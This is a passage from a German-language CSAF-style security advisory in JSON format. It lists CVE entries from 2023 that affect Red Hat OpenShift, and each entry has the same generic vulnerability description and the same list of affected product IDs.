"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-2975"
},
{
"cve": "CVE-2023-31083",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-31083"
},
{
"cve": "CVE-2023-31122",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-31122"
},
{
"cve": "CVE-2023-3446",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-3446"
},
{
"cve": "CVE-2023-3567",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-3567"
},
{
"cve": "CVE-2023-3618",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-3618"
},
{
"cve": "CVE-2023-37453",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-37453"
},
{
"cve": "CVE-2023-3817",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-3817"
},
{
"cve": "CVE-2023-38469",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-38469"
},
{
"cve": "CVE-2023-38470",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-38470"
},
{
"cve": "CVE-2023-38471",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-38471"
},
{
"cve": "CVE-2023-38472",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-38472"
},
{
"cve": "CVE-2023-38473",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-38473"
},
{
"cve": "CVE-2023-38546",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-38546"
},
{
"cve": "CVE-2023-39189",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-39189"
},
{
"cve": "CVE-2023-39193",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-39193"
},
{
"cve": "CVE-2023-39194",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-39194"
},
{
"cve": "CVE-2023-39198",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-39198"
},
{
"cve": "CVE-2023-39326",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-39326"
},
{
"cve": "CVE-2023-40745",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-40745"
},
{
"cve": "CVE-2023-41175",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-41175"
},
{
"cve": "CVE-2023-4133",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-4133"
},
{
"cve": "CVE-2023-42754",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-42754"
},
{
"cve": "CVE-2023-42756",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-42756"
},
{
"cve": "CVE-2023-43785",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-43785"
},
{
"cve": "CVE-2023-43786",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-43786"
},
{
"cve": "CVE-2023-43787",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-43787"
},
{
"cve": "CVE-2023-43788",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-43788"
},
{
"cve": "CVE-2023-43789",
"notes": [
{
"category": "description",
